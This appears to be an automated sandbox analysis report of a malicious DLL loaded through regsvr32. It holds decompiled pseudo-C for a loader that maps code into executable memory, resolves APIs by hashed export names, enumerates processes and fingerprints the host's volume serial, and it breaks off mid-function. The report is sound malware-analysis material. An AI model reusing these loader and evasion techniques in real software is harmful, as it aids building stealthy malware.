6d518d95-6d518d9e 260->264 261->260 261->261 264->264 265 6d518da0-6d518dc2 264->265 265->252
            C-Code - Quality: 80%
            			E6D518A58() {
            				void* __edi;
            				signed int _t211;
            				long _t221;
            				void* _t222;
            				intOrPtr _t250;
            				signed int _t280;
            				void* _t296;
            				intOrPtr _t298;
            				signed int _t299;
            				intOrPtr _t303;
            				void* _t305;
            				signed int _t306;
            				intOrPtr _t307;
            				intOrPtr _t308;
            				intOrPtr _t313;
            				intOrPtr _t315;
            				void* _t332;
            				signed int _t339;
            				signed int _t340;
            				signed int _t341;
            				signed int _t342;
            				void* _t343;
            				signed int _t344;
            				signed short _t349;
            				signed int _t350;
            				void* _t354;
            				signed int _t356;
            				signed int _t359;
            				signed int _t363;
            				signed int _t366;
            				signed int* _t368;
            				signed int _t372;
            				signed int _t374;
            				signed int _t382;
            				signed int _t383;
            				signed int _t385;
            				void* _t386;
            				void* _t387;
            
            				_t307 =  *((intOrPtr*)(_t386 + 0x28));
            				_t341 =  *(_t386 + 0x30);
            				_t298 =  *((intOrPtr*)(_t386 + 0x38)) + 0xfffff9cd;
            				 *(_t386 + 0xc) = _t307 - 0x484;
            				 *((intOrPtr*)(_t386 + 4)) = _t341 + 0xc8a;
            				 *((intOrPtr*)(_t386 + 0x3c)) = _t298;
            				_t374 = _t307 - 0xb37;
            				 *(_t386 + 0x30) =  *(_t386 + 0x40) + 0xfffffb4a;
            				_t308 =  *((intOrPtr*)(_t386 + 0x28));
            				 *(_t386 + 0xc) = _t374;
            				 *(_t386 + 0x44) = _t308 - 0x29b2;
            				 *((intOrPtr*)(_t386 + 0x28)) = _t341 + 0x71f;
            				if( *(_t386 + 0x30) == _t341 + 0xbc5) {
            					L33:
            					return  *(_t386 + 0x30) + 0xfffffbdc;
            				}
            				_t368 =  *(_t386 + 0x2c);
            				_t359 =  *(_t386 + 0x24) + 0xffffff3b;
            				_push(_t359 - 0xe2);
            				_push(_t374);
            				_push(_t359 - 0xbc5);
            				_push(_t374 + 0xb56);
            				_push(_t368);
            				_push(_t298 + 0x241);
            				_push(_t359 + 0x10);
            				_t342 =  *(_t386 + 0x4c);
            				_push(_t341 + 0x640);
            				_push(_t308);
            				_push(_t374 - 0x88);
            				_push(_t359 - 0x8ca);
            				_push(_t342 + 0x3a5);
            				_push(_t308 - 0x10e);
            				_push(_t342 + 0x4b6);
            				_push(_t359 + 0x3f2);
            				_push(_t374 + 0x71c);
            				_t299 = E6D5050EC();
            				_t387 = _t386 + 0x40;
            				 *(_t387 + 0x40) = _t299;
            				_t368[0x15] =  *((intOrPtr*)(_t368[0x11] + 6));
            				_t211 = _t368[7] ^ 0x000007e6;
            				_t313 =  *((intOrPtr*)(_t368[0x49] + 0x80)) - 0xcbc;
            				 *((intOrPtr*)(_t387 + 0x24)) = _t313;
            				if(_t313 == _t211) {
            					L5:
            					_t343 = 0x24ad;
            					_t368[0x1b] = _t368[0x11] + 0xf8;
            					_t368[0x24] = _t368[0x24] * 0x5494;
            					if(( *(_t368[0x14] + 0x1c) ^ 0x000002a0) == 0x24ad) {
            						L9:
            						 *((intOrPtr*)(_t387 + 0x4c)) =  *((intOrPtr*)(_t387 + 0x4c)) + 0x252e;
            						_t221 =  *((intOrPtr*)(_t368[0x11] + 0x50)) + 0x00000fff & 0xfffff000;
            						_t368[0x30] = _t221;
            						_t222 = VirtualAlloc(0, _t221, 0x3000, 0x40); // executed
            						_t368[0x10] = _t222;
            						if(_t368[0x1d] >= 0x2597) {
            							 *((intOrPtr*)(_t368[4] + 0x90)) =  *((intOrPtr*)( *_t368 + 0x168)) - 0x1eee;
            						}
            						_t368[0xe] = _t368[0xa] - 0x2749;
            						_t368[0x34] = _t368[0x34] + 0x21e9 - _t368[0x22];
            						E6D509250(_t359, _t368[0x10], 0, _t368[0x30]);
            						E6D508CD0(_t368[0x10], _t368[8],  *((intOrPtr*)(_t368[0x11] + 0x54)));
            						_t386 = _t387 + 0x18;
            						_t344 =  *(_t386 + 0x44);
            						if(_t344 <=  *((intOrPtr*)(_t387 + 0x28)) + 0xfffff303) {
            							L32:
            							goto L33;
            						} else {
            							_t84 = _t299 - 0x7e8; // -2024
            							if(_t344 <= _t84) {
            								if(_t368[0x1d] < (_t368[0x4f] * _t368[0xe] & _t374)) {
            									_t315 =  *((intOrPtr*)(_t386 + 0x18));
            									if(_t315 != (_t368[0x19] ^ _t359) && _t315 > _t299 *  *(_t386 + 0x10)) {
            										_t368[0x24] = _t368[0x24] ^ _t368[0x22] + 0x000029d1;
            									}
            								} else {
            									_t368[0x56] = _t368[0x56] - _t368[0x18] +  *((intOrPtr*)(_t386 + 0x18));
            									 *(_t386 + 0x24) =  *_t368 | 0x00002749;
            									_push(( *(_t386 + 0x2c))[0x5a] *  *(_t386 + 0x40) &  *(_t386 + 0x40));
            									_t303 =  *((intOrPtr*)(_t386 + 0x48));
            									_t250 = E6D506BBA(_t303,  *(_t386 + 0x30), _t368[0x13] + _t368[9], _t368[0x36] + _t344, 0xffffb260 - _t368[0x4c], ( *(_t386 + 0x2c))[0x45] * _t368[0x4c] | _t368[0x4c],  *((intOrPtr*)(_t386 + 0x38)) - ( *(_t386 + 0x2c))[0x75] ^  *(_t386 + 0x4c), ( *_t368 *  *(_t386 + 0x44) ^  *(_t386 + 0x44)) * (( *(_t386 + 0x2c))[0xf] + 0x2872) *  *(_t386 + 0x10) * 0xffffb260);
            									_t386 = _t386 + 0x24;
            									_t382 =  *(_t386 + 0x40);
            									_t349 =  *(_t303 + 0x1d4) & 0x0000ffff;
            									_t363 =  *(_t386 + 0x30);
            									_t372 =  *(_t386 + 0x14);
            									_push( *((intOrPtr*)(_t303 + 0x100)) - _t382);
            									 *((intOrPtr*)(_t386 + 0x3c)) = _t250;
            									_push( *(_t303 + 0x13c) & _t349 & 0x0000ffff);
            									_push( *((intOrPtr*)(_t386 + 0x54)) + 0x2749);
            									_push(_t363 - 0x0000252e & _t382);
            									_push(_t349 - 0x4da0);
            									InitializeCriticalSection(_t372 ^ 0x000024ad);
            									 *((intOrPtr*)(_t303 + 0x124)) = 0xffffd370;
            									 *(_t303 + 0x48) =  *(_t303 + 0x48) ^ _t372 & 0x00002201;
            									 *((intOrPtr*)(_t303 + 0x1c)) =  *((intOrPtr*)(_t303 + 0x1c)) + (_t372 - 0x00002ab3 &  *(_t386 + 0x44));
            									 *((intOrPtr*)(_t303 + 0x3c)) =  *((intOrPtr*)(_t303 + 0x3c)) - _t363 * _t382;
            								}
            								goto L32;
            							}
            							_t366 =  *(_t368[0x75] + 0x80) ^ 0x00002ea5;
            							while(_t366 < (_t368[0x15] & 0x0000ffff)) {
            								_t383 =  *_t368;
            								_t350 = _t368[0x1b];
            								_t305 =  *(_t383 + 0x1c) * _t366 * 0x4cafdec8 + _t350;
            								if(( !( *((intOrPtr*)(_t368[0x11] + 0x3c)) - 1) &  *((intOrPtr*)(_t350 + 0x10)) - 0x00000001 +  *((intOrPtr*)(_t368[0x11] + 0x3c))) == 0 ||  *((intOrPtr*)(_t305 + 0x14)) == 0 ||  *((intOrPtr*)(_t305 + 0x10)) == 0) {
            									L24:
            									_t366 = _t366 + 1;
            									continue;
            								} else {
            									 *((intOrPtr*)(_t368[0x49] + 0x28)) =  *((intOrPtr*)(_t368[0x49] + 0x28)) + 0xffffe185 -  *((intOrPtr*)(_t383 + 0xd0));
            									if( *(_t368[0x75] + 0x80) - 0x32d < _t368[0x5e]) {
            										_t368[0x60] = _t368[0x60] | _t368[9] * 0x0000252e;
            									}
            									_t354 = 0x29b2;
            									if(( *(_t368[0x22] + 0x1c) ^ 0x00000fb9) == 0x29b2) {
            										L21:
            										E6D508CD0( *((intOrPtr*)(_t305 + 0xc)) + _t368[0x10],  *((intOrPtr*)(_t305 + 0x14)) + _t368[8],  *((intOrPtr*)(_t305 + 0x10)));
            										_t280 = _t368[0x24];
            										_t386 = _t386 + 0xc;
            										_t332 = 3;
            										do {
            											_t280 = _t280 * 0x29b3;
            											_t332 = _t332 - 1;
            										} while (_t332 != 0);
            										_t368[0x24] = _t280;
            										_t368[9] =  &(_t368[0x35]) * _t368[9];
            										 *((intOrPtr*)(_t368[0x1d] + 0x90)) = _t368[0x4f] - 0x24ad;
            										goto L24;
            									} else {
            										do {
            											_t354 = _t354 + 1;
            											 *(_t368[0x14] + 0x90) = _t368[0x69] | 0x000029b2;
            										} while (_t354 != ( *(_t368[0x22] + 0x1c) ^ 0x00000fb9));
            										goto L21;
            									}
            								}
            							}
            							 *((intOrPtr*)(_t368[0x49] + 0x24)) =  *((intOrPtr*)(_t368[0x49] + 0x24)) +  *((intOrPtr*)(_t368[0x75] + 0x168)) - 0x1e7b;
            							goto L32;
            						}
            					}
            					_t306 = _t368[0x2f] * 0x260d;
            					_t339 = _t368[0x39];
            					_t385 = _t368[0x14];
            					do {
            						_t339 = _t339 ^ _t306;
            						_t343 = _t343 + 1;
            						_t368[0x39] = _t339;
            					} while (_t343 != ( *(_t385 + 0x1c) ^ 0x000002a0));
            					_t299 =  *(_t387 + 0x40);
            					_t374 =  *(_t387 + 0x14);
            					goto L9;
            				} else {
            					_t340 = _t368[0x4c];
            					_t356 = _t368[2] ^ 0x00002872;
            					_t296 = _t211 -  *((intOrPtr*)(_t387 + 0x24));
            					do {
            						_t340 = _t340 + _t356;
            						_t296 = _t296 - 1;
            					} while (_t296 != 0);
            					_t368[0x4c] = _t340;
            					goto L5;
            				}
            			}

            APIs
            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 6D518C19
              • Part of subcall function 6D506BBA: LoadLibraryA.KERNEL32(?,?,?,?,?,6D502E8B,?,?,?,?,?,?,?,?,?,?), ref: 6D506C04
            • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 6D518EFC
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: AllocCriticalInitializeLibraryLoadSectionVirtual
            • String ID: .%
            • API String ID: 485185432-31117204
            • Opcode ID: 16ffec23eec426799c00ab9f6824433f2cffe1da31990c24cdaf012809271147
            • Instruction ID: 6a74e3a7684b45281df08fdef07ccf0abe93fc0b371ee74bb2a2e449667a4166
            • Opcode Fuzzy Hash: 16ffec23eec426799c00ab9f6824433f2cffe1da31990c24cdaf012809271147
            • Instruction Fuzzy Hash: 67E126716047059FD328CF28C985AABB7F9FF88304F044A6EEA9A8B651D734F944CB51
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            control_flow_graph 286 27abb07-27abb2f CreateToolhelp32Snapshot 287 27abb9f-27abba5 286->287 288 27abb31-27abb5a call 27a8f0a Process32First 286->288 291 27abb6a-27abb7a call 27adb70 288->291 292 27abb5c-27abb68 288->292 295 27abb8f-27abb9c FindCloseChangeNotification 291->295 296 27abb7c-27abb8d 291->296 292->287 295->287 296->291 296->295
            C-Code - Quality: 72%
            			E027ABB07(void* __ecx, void* __edx) {
            				void* _v304;
            				char _v308;
            				intOrPtr _v312;
            				signed int _t16;
            				signed int _t17;
            				intOrPtr _t30;
            				void* _t33;
            				intOrPtr _t38;
            				void* _t43;
            				void* _t45;
            
            				_t33 = __edx;
            				_v304 = __ecx;
            				_t16 = CreateToolhelp32Snapshot(2, 0);
            				_t45 = _t16;
            				_t17 = _t16 | 0xffffffff;
            				if(_t45 != _t17) {
            					E027A8F0A( &_v304, 0, 0x128);
            					_v304 = 0x128;
            					if(Process32First(_t45,  &_v304) != 0) {
            						while(1) {
            							_t43 = _v312( &_v308, _t33);
            							if(_t43 == 0) {
            								break;
            							}
            							_t38 =  *0x27bf8e0; // 0x47ff8c0
            							_push( &_v308);
            							_push(_t45);
            							if( *((intOrPtr*)(_t38 + 0x44))() != 0) {
            								continue;
            							}
            							break;
            						}
            						FindCloseChangeNotification(_t45);
            						_t17 = 0 | _t43 == 0x00000000;
            					} else {
            						_t30 =  *0x27bf8e0; // 0x47ff8c0
            						 *((intOrPtr*)(_t30 + 0x30))(_t45);
            						_t17 = 0xfffffffe;
            					}
            				}
            				return _t17;
            			}

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 027ABB25
              • Part of subcall function 027A8F0A: memset.MSVCRT ref: 027A8F1C
            • Process32First.KERNEL32(00000000,?), ref: 027ABB55
            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 027ABB95
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32memset
            • String ID:
            • API String ID: 3344077921-0
            • Opcode ID: b0af8d0decce2a2fd46174015c844e8a44f8337ed43d579b9927cdbeb471d1a7
            • Instruction ID: f50eb1344b4ea6a4b23a33de4b44be874f21cf38f55d87abf3b2526c00351bd5
            • Opcode Fuzzy Hash: b0af8d0decce2a2fd46174015c844e8a44f8337ed43d579b9927cdbeb471d1a7
            • Instruction Fuzzy Hash: 68116D726052016BC710EE68EC59F6A77ECFF89674F140E69F520C7180EB34D91587A6
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 94%
            			E027AC789(WCHAR* __ecx, WCHAR* __edx) {
            				long _v8;
            				long _v12;
            				WCHAR* _v16;
            				short _v528;
            				short _v1040;
            				short _v1552;
            				intOrPtr _t23;
            				WCHAR* _t27;
            				signed int _t29;
            				void* _t33;
            				long _t38;
            				WCHAR* _t43;
            				WCHAR* _t56;
            
            				_t44 = __ecx;
            				_v8 = _v8 & 0x00000000;
            				_t43 = __edx;
            				_t56 = __ecx;
            				E027A8F0A(__edx, 0, 0x100);
            				_v12 = 0x100;
            				_t23 =  *0x27bf8e0; // 0x47ff8c0
            				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
            				lstrcpynW(__edx,  &_v528, 0x100);
            				_t27 = E027A9F8F(_t44, 0x581);
            				_v16 = _t27;
            				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
            				asm("sbb eax, eax");
            				_v8 = _v8 &  ~_t29;
            				E027A8D41( &_v16);
            				_t33 = E027AA5F3(_t43);
            				E027A9FEE( &(_t43[E027AA5F3(_t43)]), 0x100 - _t33, L"%u", _v8);
            				lstrcatW(_t43, _t56);
            				_t38 = E027AA5F3(_t43);
            				_v12 = _t38;
            				CharUpperBuffW(_t43, _t38);
            				return E027AE3C8(_t43, E027AA5F3(_t43) + _t40, 0);
            			}

            APIs
              • Part of subcall function 027A8F0A: memset.MSVCRT ref: 027A8F1C
            • lstrcpynW.KERNEL32(?,?,00000100), ref: 027AC7D0
            • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 027AC802
              • Part of subcall function 027A9FEE: _vsnwprintf.MSVCRT ref: 027AA00B
            • lstrcatW.KERNEL32(?,00000114), ref: 027AC83B
            • CharUpperBuffW.USER32(?,00000000), ref: 027AC84D
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
            • String ID:
            • API String ID: 455400327-0
            • Opcode ID: 260891d01e1c8a2a63c168d3e16e5d121ff55001447779bf64158238afbd1687
            • Instruction ID: 685dc0f7fcc2245df78cf285a263480f05ce117d3a68c3dc3b05f681c66e4f54
            • Opcode Fuzzy Hash: 260891d01e1c8a2a63c168d3e16e5d121ff55001447779bf64158238afbd1687
            • Instruction Fuzzy Hash: 6E2174B2D40218BFEB05ABA4DC5DFEE77BDEF84320F104665F601D6180EA749A448F60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 162 6d515750-6d5157ae 163 6d5157bd-6d5157c7 162->163 164 6d5157b0-6d5157b7 163->164 165 6d5157c9-6d5157cb 163->165 164->163 166 6d5157d4-6d51583d GetProcessHeap 165->166 167 6d5157cd-6d5157cf 165->167 169 6d515864-6d515866 166->169 170 6d51583f-6d515845 166->170 168 6d5158fc-6d515900 167->168 172 6d515868-6d515886 RtlAllocateHeap 169->172 173 6d5158cd-6d5158dd 169->173 171 6d515847-6d51585d 170->171 171->171 176 6d51585f 171->176 177 6d515899-6d5158ca call 6d509250 172->177 178 6d515888-6d515896 172->178 174 6d5158fa 173->174 175 6d5158df-6d5158eb 173->175 174->168 180 6d5158ed-6d5158f2 175->180 176->169 177->173 178->177 180->180 182 6d5158f4 180->182 182->174
            C-Code - Quality: 100%
            			E6D515750() {
            				void* __edi;
            				signed char _t69;
            				void* _t79;
            				void* _t80;
            				signed int _t94;
            				signed int _t95;
            				signed int _t98;
            				void* _t102;
            				void* _t104;
            				signed int _t113;
            				void* _t114;
            				signed int _t115;
            				long _t116;
            				signed int _t118;
            				intOrPtr* _t119;
            				intOrPtr _t120;
            				void* _t122;
            				void* _t123;
            
            				_t94 =  *(_t123 + 0xc) & 0x0000ffff;
            				_t119 =  *((intOrPtr*)(_t123 + 0x10));
            				_t113 = _t94 ^ 0x000029d1;
            				 *(_t119 + 0x48) =  *((intOrPtr*)(_t119 + 0x4c)) - 0x260d;
            				 *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x74)) + 0x168)) =  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x74)) + 0x168)) + 0xffffff28 - _t119;
            				_t120 =  *((intOrPtr*)(_t119 + 0x74));
            				_t116 =  *(_t119 + 0x8c);
            				 *(_t119 + 0x190) = _t113;
            				 *(_t119 + 0x90) =  *( *((intOrPtr*)(_t119 + 0x50)) + 0xc4) * 0x29b2;
            				_t98 =  *(_t120 + 0x80) ^ 0x00000b8b;
            				while(_t98 <= ( *(_t120 + 0x1c) ^ 0x00000322)) {
            					_t113 = _t113 + 0x252e;
            					_t98 = _t98 + 1;
            					 *(_t119 + 0x190) = _t113;
            				}
            				if(_t116 != 0) {
            					_t122 =  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x124)) + 0x1c)) - 0x260d;
            					 *( *((intOrPtr*)(_t119 + 0x88)) + 0x130) =  *( *((intOrPtr*)(_t119 + 0x88)) + 0x130) |  *(_t119 + 0xd0) ^ 0x00002ea5;
            					_t69 = M6D53866A; // 0x6f
            					 *(_t119 + 0x24) =  *(_t119 + 0x24) | _t94 | _t69 & 0x000000ff;
            					_t114 = GetProcessHeap();
            					_t102 = 0x1df3;
            					 *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x88)) + 0x148)) = 0x5b49c1e;
            					 *(_t119 + 0x168) =  *(_t119 + 0x168) & 0x00000000;
            					if(( *( *((intOrPtr*)(_t119 + 0x124)) + 0x2c) ^ 0x00003586) == 0x1df3) {
            						L9:
            						if(_t114 != 0) {
            							_t80 = RtlAllocateHeap(_t114, 0, _t116); // executed
            							_t122 = _t80;
            							if( *((intOrPtr*)(_t119 + 0x130)) >  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x74)) + 0x4c)) + 0x3c4) {
            								 *(_t119 + 0x48) =  *(_t119 + 0x48) ^  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x1d4)) + 0xf8)) - _t94;
            							}
            							 *((intOrPtr*)( *(_t119 + 8) + 0x180)) =  *((intOrPtr*)( *(_t119 + 8) + 0x180)) - ( *(_t119 + 0xd8) ^ _t94);
            							 *( *((intOrPtr*)(_t119 + 0x124)) + 0x3c) =  *( *((intOrPtr*)(_t119 + 0x124)) + 0x3c) ^ 0xfffffab9;
            							E6D509250(_t116, _t122,  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x50)) + 0x1c)) - 0x260d, _t116);
            						}
            						_t104 =  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x10)) + 0x4c)) - 0x76;
            						if(_t104 >= 0x2597) {
            							L17:
            							return _t122;
            						} else {
            							_t115 =  *(_t119 + 0xd8);
            							_t118 =  *(_t119 + 8) * _t94;
            							_t79 = 0x2597 - _t104;
            							do {
            								_t115 = _t115 ^ _t118;
            								_t79 = _t79 - 1;
            							} while (_t79 != 0);
            							 *(_t119 + 0xd8) = _t115;
            							goto L17;
            						}
            					}
            					_t95 = _t94 - 0x252e;
            					do {
            						 *( *_t119 + 0x30) =  *( *_t119 + 0x30) | _t95;
            						_t102 = _t102 + 1;
            					} while (_t102 != ( *( *((intOrPtr*)(_t119 + 0x124)) + 0x2c) ^ 0x00003586));
            					_t94 =  *(_t123 + 0x18) & 0x0000ffff;
            					goto L9;
            				}
            				return 0;
            			}

            APIs
            • GetProcessHeap.KERNEL32(?,?,?,?,6D5045B2,?,00002EA5,?,?,6D51A749,?,?,?,0000074E,?,000003A9), ref: 6D515809
            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 6D51586C
            Strings
            • oach pursuit visits funny assume sadness haul probably sketch sparrow troublesome potatoes milk distracted tremble rage varying concession wit banged profit odour startle procession admired armour projects charm insane reproof inject drugstore trout parlor hop, xrefs: 6D5157FC
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: Heap$AllocateProcess
            • String ID: oach pursuit visits funny assume sadness haul probably sketch sparrow troublesome potatoes milk distracted tremble rage varying concession wit banged profit odour startle procession admired armour projects charm insane reproof inject drugstore trout parlor hop
            • API String ID: 1357844191-1397620714
            • Opcode ID: e00f12af5fed268d3a4ac25c7ad6283c421d3d24404282c3933b491f486a7b50
            • Instruction ID: 3bd6a178568c2d6294888b88cf8e613908255cec89ac3f85d2395a9daef9d129
            • Opcode Fuzzy Hash: e00f12af5fed268d3a4ac25c7ad6283c421d3d24404282c3933b491f486a7b50
            • Instruction Fuzzy Hash: FA513A356047018FD768CF39C894AA6B7F1FF48311F11896EE5AACBB91DB31A805CB10
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 183 27aefb8-27aefcf 184 27af02c 183->184 185 27aefd1-27aeff9 183->185 186 27af02e-27af032 184->186 185->184 187 27aeffb-27af01e call 27aa5da call 27ae3c8 185->187 192 27af033-27af04a 187->192 193 27af020-27af02a 187->193 194 27af04c-27af054 192->194 195 27af0a0-27af0a2 192->195 193->184 193->187 194->195 196 27af056 194->196 195->186 197 27af058-27af05e 196->197 198 27af06e-27af07f 197->198 199 27af060-27af062 197->199 201 27af081-27af082 198->201 202 27af084-27af090 LoadLibraryA 198->202 199->198 200 27af064-27af06c 199->200 200->197 200->198 201->202 202->184 203 27af092-27af09c GetProcAddress 202->203 203->184 204 27af09e 203->204 204->186
            C-Code - Quality: 100%
            			E027AEFB8(void* __ecx, intOrPtr __edx) {
            				signed int _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				char _v92;
            				intOrPtr _t41;
            				signed int _t47;
            				signed int _t49;
            				signed int _t51;
            				void* _t56;
            				struct HINSTANCE__* _t58;
            				_Unknown_base(*)()* _t59;
            				intOrPtr _t60;
            				void* _t62;
            				intOrPtr _t63;
            				void* _t69;
            				char _t70;
            				void* _t75;
            				CHAR* _t80;
            				void* _t82;
            
            				_t75 = __ecx;
            				_v12 = __edx;
            				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
            				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
            				if(_t41 == 0) {
            					L4:
            					return 0;
            				}
            				_t62 = _t41 + __ecx;
            				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
            				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
            				_t63 =  *((intOrPtr*)(_t62 + 0x18));
            				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
            				_t47 = 0;
            				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
            				_v8 = 0;
            				_v16 = _t63;
            				if(_t63 == 0) {
            					goto L4;
            				} else {
            					goto L2;
            				}
            				while(1) {
            					L2:
            					_t49 = E027AE3C8( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E027AA5DA( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
            					_t51 = _v8;
            					if((_t49 ^ 0x218fe95b) == _v12) {
            						break;
            					}
            					_t73 = _v20;
            					_t47 = _t51 + 1;
            					_v8 = _t47;
            					if(_t47 < _v16) {
            						continue;
            					}
            					goto L4;
            				}
            				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
            				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
            				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
            					return _t80;
            				} else {
            					_t56 = 0;
            					while(1) {
            						_t70 = _t80[_t56];
            						if(_t70 == 0x2e || _t70 == 0) {
            							break;
            						}
            						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
            						_t56 = _t56 + 1;
            						if(_t56 < 0x40) {
            							continue;
            						}
            						break;
            					}
            					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
            					 *((char*)(_t82 + _t56 - 0x54)) = 0;
            					if( *((char*)(_t56 + _t80)) != 0) {
            						_t80 =  &(( &(_t80[1]))[_t56]);
            					}
            					_t40 =  &_v92; // 0x6c6c642e
            					_t58 = LoadLibraryA(_t40); // executed
            					if(_t58 == 0) {
            						goto L4;
            					}
            					_t59 = GetProcAddress(_t58, _t80);
            					if(_t59 == 0) {
            						goto L4;
            					}
            					return _t59;
            				}
            			}

            APIs
            • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 027AF088
            • GetProcAddress.KERNEL32(00000000,?), ref: 027AF094
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: .dll
            • API String ID: 2574300362-2738580789
            • Opcode ID: 0e7678505cfe728bc8ebee968777d1729249be57bb77492f40fb57c8a4ae4d7f
            • Instruction ID: aed7daef85c156b8cb9c378bda846021b3d2e10832b37e95c582b505a3737c18
            • Opcode Fuzzy Hash: 0e7678505cfe728bc8ebee968777d1729249be57bb77492f40fb57c8a4ae4d7f
            • Instruction Fuzzy Hash: 59312531A00215CBCB24CF6CC891BAFBBF5AF94328F284569D945E7701D771D941CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 266 27a8b74-27a8b89 267 27a8b8b-27a8b8e 266->267 268 27a8bac 266->268 269 27a8b95-27a8ba5 267->269 270 27a8bb1-27a8bd1 268->270 271 27a8ba7-27a8baa 269->271 272 27a8c04-27a8c06 269->272 273 27a8bd3-27a8bd8 270->273 274 27a8be1-27a8be5 270->274 271->268 271->269 272->268 278 27a8c08-27a8c0c call 27a8d70 272->278 273->273 275 27a8bda-27a8bdf 273->275 276 27a8bf3-27a8bfd lstrlenW 274->276 277 27a8be7-27a8bf1 274->277 275->274 275->277 279 27a8bff-27a8c03 276->279 277->276 277->277 281 27a8c11-27a8c19 278->281 282 27a8c1b-27a8c20 281->282 283 27a8c22-27a8c27 281->283 282->279 284 27a8c29-27a8c40 283->284 284->284 285 27a8c42-27a8c45 284->285 285->270
            C-Code - Quality: 80%
            			E027A8B74(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				intOrPtr _v28;
            				short _v44;
            				void* _t38;
            				intOrPtr _t47;
            				void* _t53;
            				intOrPtr _t54;
            				intOrPtr _t55;
            				intOrPtr _t56;
            				void* _t58;
            				intOrPtr _t59;
            				void* _t62;
            				void* _t64;
            				signed int _t71;
            				signed int _t74;
